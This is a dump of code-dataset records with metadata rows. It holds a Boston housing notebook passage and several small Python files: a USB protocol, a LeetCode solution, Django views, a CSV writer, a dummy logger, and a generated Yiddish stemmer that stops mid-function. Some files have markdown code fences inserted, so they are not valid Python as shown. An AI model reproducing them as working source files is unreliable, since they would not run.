# * Do these prices seem reasonable given the values for the respective features?
#
# **Hint:** Use the statistics you calculated in the **Data Exploration** section to help justify your response. Of the three clients, client 3 has the biggest house, in the best public school neighborhood with the lowest poverty level; while client 2 has the smallest house, in a neighborhood with a relatively high poverty rate and not the best public schools.
#
# Run the code block below to have your optimized model make predictions for each client's home.
# In[ ]:
# Produce a matrix for client data
client_data = [[5, 17, 15], [4, 32, 22], [8, 3, 12]]
# Show predictions
for i, price in enumerate(reg.predict(client_data)):
    print("Predicted selling price for Client {}'s home: ${:,.2f}".format(i+1, price))
# ### Visualization
# In[ ]:
from matplotlib import pyplot as plt
clients = np.transpose(client_data)
pred = reg.predict(client_data)
for i, feat in enumerate(['RM', 'LSTAT', 'PTRATIO']):
    plt.scatter(features[feat], prices, alpha=0.25, c=prices)
    plt.scatter(clients[i], pred, color='black', marker='x', linewidths=2)
    plt.xlabel(feat)
    plt.ylabel('MEDV')
    # Show one plot per feature
    plt.show()
# **Answer:**
#
# Client 1: $403,025.00
#
# Client 2: $237,478.72
#
# Client 3: $931,636.36
#
# In our initial **Data Exploration** section, we saw that the price is positively correlated with the number of rooms and negatively correlated with the neighbourhood poverty level and the student-teacher ratio of nearby schools. These were the statistics of our data:
#
# Minimum price: $105,000.00
#
# Maximum price: $1,024,800.00
#
# Mean price: $454,342.94
#
# Median price: $438,900.00
#
# Standard deviation of prices: $165,340.28
#
# So we see that for Clients 1 and 2, the price of the house is below the median price of the houses. This is reasonable because of
#
# a) the average poverty level and student-teacher ratio for Client 1, and
#
# b) the high poverty level and student-teacher ratio for Client 2.
#
# For Client 3, we see that the price is well over the median house price and very close to the maximum house price. This is also reasonable because of very low Poverty Level and Student to Teacher ratio and also a high number of rooms.
#
# So overall, the prices for all the clients seem reasonable.
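# As a quick numeric sanity check, we can express each predicted price as a number of standard deviations from the mean, using the statistics quoted above (the figures below are taken from the Data Exploration output):

```python
mean_price = 454342.94
std_price = 165340.28
predictions = {'Client 1': 403025.00, 'Client 2': 237478.72, 'Client 3': 931636.36}

for client, price in predictions.items():
    z = (price - mean_price) / std_price
    print("{}: {:+.2f} standard deviations from the mean".format(client, z))
```

# Clients 1 and 2 sit below the mean (about -0.31 and -1.31 standard deviations), while Client 3 is nearly +2.89 standard deviations above it, consistent with the discussion above.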
# ### Performance Metric
#
# Let us calculate the R squared value for our model.
# In[ ]:
reg = fit_model(X_train, y_train)
pred = reg.predict(X_test)
score = performance_metric(y_test,pred)
print("R Squared Value: " + str(score))
# So we get a pretty good R squared score from our model.
# ### Visualization
# In[ ]:
import matplotlib.pyplot as plt
plt.hist(prices, bins = 20)
for price in reg.predict(client_data):
    plt.axvline(price, lw = 5, c = 'r')
# ### Sensitivity
# An optimal model is not necessarily a robust model. Sometimes, a model is either too complex or too simple to sufficiently generalize to new data. Sometimes, a model could use a learning algorithm that is not appropriate for the structure of the data given. Other times, the data itself could be too noisy or contain too few samples to allow a model to adequately capture the target variable — i.e., the model is underfitted.
#
# **Run the code cell below to run the `fit_model` function ten times with different training and testing sets to see how the prediction for a specific client changes with respect to the data it's trained on.**
# In[ ]:
PredictTrials(features, prices, fit_model, client_data)
# ### Question 11 - Applicability
#
# * In a few sentences, discuss whether the constructed model should or should not be used in a real-world setting.
#
# **Hint:** Take a look at the range in prices as calculated in the code snippet above. Some questions to answering:
# - How relevant today is data that was collected from 1978? How important is inflation?
# - Are the features present in the data sufficient to describe a home? Do you think factors like the quality of appliances in the home, the square footage of the plot, or the presence of a pool should factor in?
# - Is the model robust enough to make consistent predictions?
# - Would data collected in an urban city like Boston be applicable in a rural city?
# - Is it fair to judge the price of an individual home based on the characteristics of the entire neighborhood?
# **Answer:**
#
# 1) The data, which was collected in 1978, is not very relevant today because demographics and the economy have changed a lot since then.
#
# 2) The features present in the data are not sufficient to describe a home. There are only three features present right now. We could add more features like crime rate, transportation availability, presence of a pool, square footage of the plot, quality of appliances, flooring in the home, and more.
#
# 3) This model, based on its current features, is robust enough to make consistent predictions with a small margin of error.
#
# 4) Data collected in an urban city like Boston may not be applicable in a rural city, as many properties such as demographics, the economy, and average income will differ. So we would have to take a lot of other features into account in order to build an effective model.
#
# 5) The neighbourhood plays a vital role in judging the price of a house through factors like the crime rate, schools, and transportation. But if an individual house has marked characteristics that overshadow the neighbourhood's influence, then it would not be fair to judge its price solely on the characteristics of the entire neighborhood.
| 63.445869 | 1,044 | 0.74391 | 7,137 | 44,539 | 4.60936 | 0.157909 | 0.007599 | 0.013679 | 0.004377 | 0.207982 | 0.169894 | 0.116789 | 0.096453 | 0.074596 | 0.056236 | 0 | 0.01516 | 0.18101 | 44,539 | 701 | 1,045 | 63.536377 | 0.886586 | 0.806619 | 0 | 0.167785 | 0 | 0 | 0.111912 | 0.012932 | 0 | 0 | 0 | 0.001427 | 0 | 1 | 0.033557 | false | 0 | 0.14094 | 0 | 0.187919 | 0.127517 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be9907041af54ace61dd5b4a68c1b53737c2bbfe | 353 | py | Python | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | 1 | 2021-12-05T13:55:04.000Z | 2021-12-05T13:55:04.000Z | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | null | null | null | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import Protocol, runtime_checkable
import usb.core
@runtime_checkable
class Device(Protocol):
    """Structural interface for a USB device wrapper.

    @runtime_checkable only enables isinstance() checks for member
    presence; signatures are not verified at runtime.
    """

    @property
    @abstractmethod
    def endpoint_in(self) -> usb.core.Endpoint:
        ...

    @property
    @abstractmethod
    def is_open(self) -> bool:
        ...

    def close(self) -> None:
        ...
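# Because the protocol above is decorated with @runtime_checkable, any object with
# the right members passes an isinstance() check, with no inheritance required. A
# minimal sketch of the pattern without the pyusb dependency (class names here are
# illustrative, not part of the module):

```python
from typing import Protocol, runtime_checkable

@runtime_checkable
class Closeable(Protocol):
    def close(self) -> None: ...

class FakeDevice:
    """Does not inherit from Closeable, but structurally matches it."""
    def __init__(self) -> None:
        self.closed = False
    def close(self) -> None:
        self.closed = True

class NotADevice:
    pass

# isinstance() against a runtime_checkable Protocol only checks that the
# members exist; it does not validate signatures or return types.
print(isinstance(FakeDevice(), Closeable))   # True
print(isinstance(NotADevice(), Closeable))   # False
```

# This is what makes such protocols useful for testing: a fake device can be
# substituted for the real pyusb-backed one without any shared base class.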
| 16.045455 | 47 | 0.668555 | 40 | 353 | 5.8 | 0.575 | 0.137931 | 0.215517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25779 | 353 | 21 | 48 | 16.809524 | 0.885496 | 0 | 0 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
bea5f5d3cc66a39c609c7fa5059bdc19d1de07a4 | 544 | py | Python | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | """Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
You must implement a solution with a linear runtime complexity and use only constant extra space.
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1"""
from typing import List
class Solution:
    def singleNumber(self, nums: List[int]) -> int:
        # 2 * (sum of distinct values) - (sum of all values) isolates the
        # value that appears only once, since each duplicate pair cancels.
        return 2 * sum(set(nums)) - sum(nums)
s = Solution()
print(s.singleNumber([2, 2, 1, 1, 4]))
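# Note that the set-based trick above runs in linear time but builds a set, which
# is O(n) extra space, while the problem statement asks for constant extra space.
# The classic way to satisfy that constraint is XOR:

```python
from functools import reduce
from operator import xor

def single_number(nums):
    # x ^ x == 0 and x ^ 0 == x, so XOR-ing every element cancels the
    # duplicate pairs and leaves the element that appears exactly once.
    return reduce(xor, nums)

print(single_number([2, 2, 1, 1, 4]))  # 4
```

# This keeps a single accumulator regardless of input size, so it meets both the
# linear-runtime and constant-space requirements.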
| 18.758621 | 110 | 0.680147 | 92 | 544 | 4.021739 | 0.576087 | 0.072973 | 0.016216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048055 | 0.196691 | 544 | 28 | 111 | 19.428571 | 0.798627 | 0.626838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 0.666667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
bec43e02dd02f64ab4e0017090bf284fc5b51541 | 355 | py | Python | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | from django.shortcuts import render
from . import models
from django.views import generic
# Create your views here.
class home(generic.ListView):
    queryset = models.Entry.objects.published()  # 'objects' is the default manager name
    template_name = "law119/index.html"
    paginate_by = 2
class Detail(generic.DetailView):
    model = models.Entry  # DetailView needs a model (or queryset) to look up objects
    template_name = "law119/post.html"
| 23.666667 | 46 | 0.740845 | 46 | 355 | 5.652174 | 0.652174 | 0.076923 | 0.138462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023649 | 0.166197 | 355 | 14 | 47 | 25.357143 | 0.85473 | 0.123944 | 0 | 0 | 0 | 0 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fe2867bf6adf4da4fa9a9a0f02072d4ccf46d6fa | 277 | py | Python | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | 3 | 2017-04-26T10:32:05.000Z | 2017-12-22T11:11:15.000Z | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | 22 | 2017-12-21T09:19:56.000Z | 2020-11-30T15:48:33.000Z | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | null | null | null | import csv
class UnicodeWriter(object):
    """Thin wrapper around csv.writer.

    Named after the Python 2-era UTF-8 CSV recipe; under Python 3,
    csv.writer already handles unicode text, so this simply delegates.
    """

    def __init__(self, f, **kwargs):
        self.writer = csv.writer(f, **kwargs)

    def writerow(self, row):
        self.writer.writerow(row)

    def writerows(self, rows):
        for row in rows:
            self.writerow(row)
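# A quick usage sketch, with the wrapper restated inline so the example is
# self-contained. Any csv.writer keyword argument (delimiter, quoting, ...) passes
# straight through:

```python
import csv
import io

# Restated from the module above for a self-contained example.
class UnicodeWriter(object):
    def __init__(self, f, **kwargs):
        self.writer = csv.writer(f, **kwargs)
    def writerow(self, row):
        self.writer.writerow(row)
    def writerows(self, rows):
        for row in rows:
            self.writerow(row)

buf = io.StringIO()
writer = UnicodeWriter(buf, delimiter=";")
writer.writerows([["café", "1"], ["naïve", "2"]])
# csv.writer terminates rows with \r\n by default
print(buf.getvalue())  # café;1 and naïve;2 on separate lines
```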
| 19.785714 | 45 | 0.602888 | 35 | 277 | 4.657143 | 0.485714 | 0.08589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274368 | 277 | 13 | 46 | 21.307692 | 0.810945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fe2b4217dac1622647fec87aeab8dbf43b01b482 | 1,218 | py | Python | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | 1 | 2021-02-27T07:22:39.000Z | 2021-02-27T07:22:39.000Z | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | null | null | null | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
DUMMY LOGGER
"""
# %% LIBRARY IMPORT
# %% FILE IMPORT
from antools.logging.abstract_logger import AbstractLogger
# %% CLASSES
class _DummyLogger(AbstractLogger):
    """ Class which represents Logger when user does not want to use it """

    def __init__(self):
        self.name = "DummyLogger"

    def debug(self, msg: str):
        pass

    def info(self, msg: str):
        pass

    def warning(self, msg: str):
        pass

    def critical(self, msg: str):
        pass

    def error(self, msg: str, terminate: bool = True):
        if terminate:
            raise SystemExit(msg)

    def exception(self, msg: str, add_info: bool = False, terminate: bool = False):
        if terminate:
            raise SystemExit(msg)

    def wrong_input(self, call_object: object, var_name: str, var_value, reason: str):
        # Every value is an instance of object, so the class name can be taken directly.
        object_name = call_object.__class__.__name__
        msg = f"{object_name} obtained invalid parameter <{var_name}> = <{var_value}>. IT IS {reason}!"
        raise ValueError(msg)
# %% CREATE INSTANCE
_DUMMY_LOGGER = _DummyLogger() | 26.478261 | 103 | 0.605911 | 142 | 1,218 | 5 | 0.450704 | 0.059155 | 0.084507 | 0.078873 | 0.185915 | 0.090141 | 0 | 0 | 0 | 0 | 0 | 0.001148 | 0.284893 | 1,218 | 46 | 104 | 26.478261 | 0.814007 | 0.133826 | 0 | 0.347826 | 0 | 0 | 0.097182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.347826 | false | 0.173913 | 0.043478 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
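# This is the null-object pattern: ordinary log calls become silent no-ops, while
# error(..., terminate=True) still stops the program. A minimal stand-in (class
# name hypothetical, mirroring _DummyLogger's behaviour) demonstrating that:

```python
class DummyLoggerSketch:
    def info(self, msg: str):
        pass  # silently discarded

    def error(self, msg: str, terminate: bool = True):
        if terminate:
            raise SystemExit(msg)  # termination still happens even without logging

log = DummyLoggerSketch()
log.info("this disappears silently")

try:
    log.error("fatal problem", terminate=True)
except SystemExit as exc:
    print(f"terminated with: {exc}")  # terminated with: fatal problem
```

# Callers can therefore use the same logging calls whether a real logger or the
# dummy one is injected.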
fe322a9287c2f40b2ed87b2a3d5a5305617d6951 | 44,921 | py | Python | instruction_env/Lib/site-packages/snowballstemmer/yiddish_stemmer.py | lfunderburk/Effective-Instructions | ce40f890fb8623ff1ec9c3e9e1190505cbd1e6db | [
"MIT"
] | 3 | 2021-07-30T19:07:06.000Z | 2021-08-28T19:35:40.000Z | instruction_env/Lib/site-packages/snowballstemmer/yiddish_stemmer.py | lfunderburk/Effective-Instructions | ce40f890fb8623ff1ec9c3e9e1190505cbd1e6db | [
"MIT"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | env/lib/python3.9/site-packages/snowballstemmer/yiddish_stemmer.py | simotwo/AbileneParadox-ddd | c85961efb37aba43c0d99ed1c36d083507e2b2d3 | [
"MIT"
] | 1 | 2021-02-22T13:55:32.000Z | 2021-02-22T13:55:32.000Z | # Generated by Snowball 2.1.0 - https://snowballstem.org/
from .basestemmer import BaseStemmer
from .among import Among
class YiddishStemmer(BaseStemmer):
'''
This class implements the stemming algorithm defined by a snowball script.
Generated by Snowball 2.1.0 - https://snowballstem.org/
'''
a_0 = [
Among(u"\u05D0\u05D3\u05D5\u05E8\u05DB", -1, 1),
Among(u"\u05D0\u05D4\u05D9\u05E0", -1, 1),
Among(u"\u05D0\u05D4\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05D4\u05F2\u05DE", -1, 1),
Among(u"\u05D0\u05D5\u05DE", -1, 1),
Among(u"\u05D0\u05D5\u05E0\u05D8\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05D9\u05D1\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E0", -1, 1),
Among(u"\u05D0\u05E0\u05D8", 7, 1),
Among(u"\u05D0\u05E0\u05D8\u05E7\u05E2\u05D2\u05E0", 8, 1),
Among(u"\u05D0\u05E0\u05D9\u05D3\u05E2\u05E8", 7, 1),
Among(u"\u05D0\u05E4", -1, 1),
Among(u"\u05D0\u05E4\u05D9\u05E8", 11, 1),
Among(u"\u05D0\u05E7\u05E2\u05D2\u05E0", -1, 1),
Among(u"\u05D0\u05E8\u05D0\u05E4", -1, 1),
Among(u"\u05D0\u05E8\u05D5\u05DE", -1, 1),
Among(u"\u05D0\u05E8\u05D5\u05E0\u05D8\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E8\u05D9\u05D1\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E8\u05F1\u05E1", -1, 1),
Among(u"\u05D0\u05E8\u05F1\u05E4", -1, 1),
Among(u"\u05D0\u05E8\u05F2\u05E0", -1, 1),
Among(u"\u05D0\u05F0\u05E2\u05E7", -1, 1),
Among(u"\u05D0\u05F1\u05E1", -1, 1),
Among(u"\u05D0\u05F1\u05E4", -1, 1),
Among(u"\u05D0\u05F2\u05E0", -1, 1),
Among(u"\u05D1\u05D0", -1, 1),
Among(u"\u05D1\u05F2", -1, 1),
Among(u"\u05D3\u05D5\u05E8\u05DB", -1, 1),
Among(u"\u05D3\u05E2\u05E8", -1, 1),
Among(u"\u05DE\u05D9\u05D8", -1, 1),
Among(u"\u05E0\u05D0\u05DB", -1, 1),
Among(u"\u05E4\u05D0\u05E8", -1, 1),
Among(u"\u05E4\u05D0\u05E8\u05D1\u05F2", 31, 1),
Among(u"\u05E4\u05D0\u05E8\u05F1\u05E1", 31, 1),
Among(u"\u05E4\u05D5\u05E0\u05D0\u05E0\u05D3\u05E2\u05E8", -1, 1),
Among(u"\u05E6\u05D5", -1, 1),
Among(u"\u05E6\u05D5\u05D6\u05D0\u05DE\u05E2\u05E0", 35, 1),
Among(u"\u05E6\u05D5\u05E0\u05F1\u05E4", 35, 1),
Among(u"\u05E6\u05D5\u05E8\u05D9\u05E7", 35, 1),
Among(u"\u05E6\u05E2", -1, 1)
]
a_1 = [
Among(u"\u05D3\u05D6\u05E9", -1, -1),
Among(u"\u05E9\u05D8\u05E8", -1, -1),
Among(u"\u05E9\u05D8\u05E9", -1, -1),
Among(u"\u05E9\u05E4\u05E8", -1, -1)
]
a_2 = [
Among(u"\u05D5\u05E0\u05D2", -1, 1),
Among(u"\u05E1\u05D8\u05D5", -1, 1),
Among(u"\u05D8", -1, 1),
Among(u"\u05D1\u05E8\u05D0\u05DB\u05D8", 2, 31),
Among(u"\u05E1\u05D8", 2, 1),
Among(u"\u05D9\u05E1\u05D8", 4, 33),
Among(u"\u05E2\u05D8", 2, 1),
Among(u"\u05E9\u05D0\u05E4\u05D8", 2, 1),
Among(u"\u05D4\u05F2\u05D8", 2, 1),
Among(u"\u05E7\u05F2\u05D8", 2, 1),
Among(u"\u05D9\u05E7\u05F2\u05D8", 9, 1),
Among(u"\u05DC\u05E2\u05DB", -1, 1),
Among(u"\u05E2\u05DC\u05E2\u05DB", 11, 1),
Among(u"\u05D9\u05D6\u05DE", -1, 1),
Among(u"\u05D9\u05DE", -1, 1),
Among(u"\u05E2\u05DE", -1, 1),
Among(u"\u05E2\u05E0\u05E2\u05DE", 15, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2\u05DE", 16, 4),
Among(u"\u05E0", -1, 1),
Among(u"\u05E7\u05DC\u05D9\u05D1\u05E0", 18, 14),
Among(u"\u05E8\u05D9\u05D1\u05E0", 18, 15),
Among(u"\u05D8\u05E8\u05D9\u05D1\u05E0", 20, 12),
Among(u"\u05E9\u05E8\u05D9\u05D1\u05E0", 20, 7),
Among(u"\u05D4\u05F1\u05D1\u05E0", 18, 27),
Among(u"\u05E9\u05F0\u05D9\u05D2\u05E0", 18, 17),
Among(u"\u05D6\u05D5\u05E0\u05D2\u05E0", 18, 22),
Among(u"\u05E9\u05DC\u05D5\u05E0\u05D2\u05E0", 18, 25),
Among(u"\u05E6\u05F0\u05D5\u05E0\u05D2\u05E0", 18, 24),
Among(u"\u05D1\u05F1\u05D2\u05E0", 18, 26),
Among(u"\u05D1\u05D5\u05E0\u05D3\u05E0", 18, 20),
Among(u"\u05F0\u05D9\u05D6\u05E0", 18, 11),
Among(u"\u05D8\u05E0", 18, 4),
Among(u"GE\u05D1\u05D9\u05D8\u05E0", 31, 9),
Among(u"GE\u05DC\u05D9\u05D8\u05E0", 31, 13),
Among(u"GE\u05DE\u05D9\u05D8\u05E0", 31, 8),
Among(u"\u05E9\u05E0\u05D9\u05D8\u05E0", 31, 19),
Among(u"\u05E1\u05D8\u05E0", 31, 1),
Among(u"\u05D9\u05E1\u05D8\u05E0", 36, 1),
Among(u"\u05E2\u05D8\u05E0", 31, 1),
Among(u"GE\u05D1\u05D9\u05E1\u05E0", 18, 10),
Among(u"\u05E9\u05DE\u05D9\u05E1\u05E0", 18, 18),
Among(u"GE\u05E8\u05D9\u05E1\u05E0", 18, 16),
Among(u"\u05E2\u05E0", 18, 1),
Among(u"\u05D2\u05D0\u05E0\u05D2\u05E2\u05E0", 42, 5),
Among(u"\u05E2\u05DC\u05E2\u05E0", 42, 1),
Among(u"\u05E0\u05D5\u05DE\u05E2\u05E0", 42, 6),
Among(u"\u05D9\u05D6\u05DE\u05E2\u05E0", 42, 1),
Among(u"\u05E9\u05D8\u05D0\u05E0\u05E2\u05E0", 42, 29),
Among(u"\u05D8\u05E8\u05D5\u05E0\u05E7\u05E0", 18, 23),
Among(u"\u05E4\u05D0\u05E8\u05DC\u05F1\u05E8\u05E0", 18, 28),
Among(u"\u05E9\u05F0\u05F1\u05E8\u05E0", 18, 30),
Among(u"\u05F0\u05D5\u05D8\u05E9\u05E0", 18, 21),
Among(u"\u05D2\u05F2\u05E0", 18, 5),
Among(u"\u05E1", -1, 1),
Among(u"\u05D8\u05E1", 53, 4),
Among(u"\u05E2\u05D8\u05E1", 54, 1),
Among(u"\u05E0\u05E1", 53, 1),
Among(u"\u05D8\u05E0\u05E1", 56, 4),
Among(u"\u05E2\u05E0\u05E1", 56, 3),
Among(u"\u05E2\u05E1", 53, 1),
Among(u"\u05D9\u05E2\u05E1", 59, 2),
Among(u"\u05E2\u05DC\u05E2\u05E1", 59, 1),
Among(u"\u05E2\u05E8\u05E1", 53, 1),
Among(u"\u05E2\u05E0\u05E2\u05E8\u05E1", 62, 1),
Among(u"\u05E2", -1, 1),
Among(u"\u05D8\u05E2", 64, 4),
Among(u"\u05E1\u05D8\u05E2", 65, 1),
Among(u"\u05E2\u05D8\u05E2", 65, 1),
Among(u"\u05D9\u05E2", 64, -1),
Among(u"\u05E2\u05DC\u05E2", 64, 1),
Among(u"\u05E2\u05E0\u05E2", 64, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2", 70, 4),
Among(u"\u05E2\u05E8", -1, 1),
Among(u"\u05D8\u05E2\u05E8", 72, 4),
Among(u"\u05E1\u05D8\u05E2\u05E8", 73, 1),
Among(u"\u05E2\u05D8\u05E2\u05E8", 73, 1),
Among(u"\u05E2\u05E0\u05E2\u05E8", 72, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2\u05E8", 76, 4),
Among(u"\u05D5\u05EA", -1, 32)
]
a_3 = [
Among(u"\u05D5\u05E0\u05D2", -1, 1),
Among(u"\u05E9\u05D0\u05E4\u05D8", -1, 1),
Among(u"\u05D4\u05F2\u05D8", -1, 1),
Among(u"\u05E7\u05F2\u05D8", -1, 1),
Among(u"\u05D9\u05E7\u05F2\u05D8", 3, 1),
Among(u"\u05DC", -1, 2)
]
a_4 = [
Among(u"\u05D9\u05D2", -1, 1),
Among(u"\u05D9\u05E7", -1, 1),
Among(u"\u05D3\u05D9\u05E7", 1, 1),
Among(u"\u05E0\u05D3\u05D9\u05E7", 2, 1),
Among(u"\u05E2\u05E0\u05D3\u05D9\u05E7", 3, 1),
Among(u"\u05D1\u05DC\u05D9\u05E7", 1, -1),
Among(u"\u05D2\u05DC\u05D9\u05E7", 1, -1),
Among(u"\u05E0\u05D9\u05E7", 1, 1),
Among(u"\u05D9\u05E9", -1, 1)
]
g_niked = [255, 155, 6]
g_vowel = [33, 2, 4, 0, 6]
g_consonant = [239, 254, 253, 131]
I_x = 0
I_p1 = 0
def __r_prelude(self):
v_1 = self.cursor
try:
while True:
v_2 = self.cursor
try:
try:
while True:
v_3 = self.cursor
try:
try:
v_4 = self.cursor
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D5\u05D5"):
raise lab5()
self.ket = self.cursor
v_5 = self.cursor
try:
if not self.eq_s(u"\u05BC"):
raise lab6()
raise lab5()
except lab6: pass
self.cursor = v_5
if not self.slice_from(u"\u05F0"):
return False
raise lab4()
except lab5: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D5\u05D9"):
raise lab7()
self.ket = self.cursor
v_6 = self.cursor
try:
if not self.eq_s(u"\u05B4"):
raise lab8()
raise lab7()
except lab8: pass
self.cursor = v_6
if not self.slice_from(u"\u05F1"):
return False
raise lab4()
except lab7: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D9\u05D9"):
raise lab9()
self.ket = self.cursor
v_7 = self.cursor
try:
if not self.eq_s(u"\u05B4"):
raise lab10()
raise lab9()
except lab10: pass
self.cursor = v_7
if not self.slice_from(u"\u05F2"):
return False
raise lab4()
except lab9: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05DA"):
raise lab11()
self.ket = self.cursor
if not self.slice_from(u"\u05DB"):
return False
raise lab4()
except lab11: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05DD"):
raise lab12()
self.ket = self.cursor
if not self.slice_from(u"\u05DE"):
return False
raise lab4()
except lab12: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05DF"):
raise lab13()
self.ket = self.cursor
if not self.slice_from(u"\u05E0"):
return False
raise lab4()
except lab13: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05E3"):
raise lab14()
self.ket = self.cursor
if not self.slice_from(u"\u05E4"):
return False
raise lab4()
except lab14: pass
self.cursor = v_4
self.bra = self.cursor
if not self.eq_s(u"\u05E5"):
raise lab3()
self.ket = self.cursor
if not self.slice_from(u"\u05E6"):
return False
except lab4: pass
self.cursor = v_3
raise lab2()
except lab3: pass
self.cursor = v_3
if self.cursor >= self.limit:
raise lab1()
self.cursor += 1
except lab2: pass
continue
except lab1: pass
self.cursor = v_2
break
except lab0: pass
self.cursor = v_1
v_8 = self.cursor
try:
while True:
v_9 = self.cursor
try:
try:
while True:
v_10 = self.cursor
try:
self.bra = self.cursor
if not self.in_grouping(YiddishStemmer.g_niked, 1456, 1474):
raise lab18()
self.ket = self.cursor
if not self.slice_del():
return False
self.cursor = v_10
raise lab17()
except lab18: pass
self.cursor = v_10
if self.cursor >= self.limit:
raise lab16()
self.cursor += 1
except lab17: pass
continue
except lab16: pass
self.cursor = v_9
break
except lab15: pass
self.cursor = v_8
return True
def __r_mark_regions(self):
self.I_p1 = self.limit
v_1 = self.cursor
try:
try:
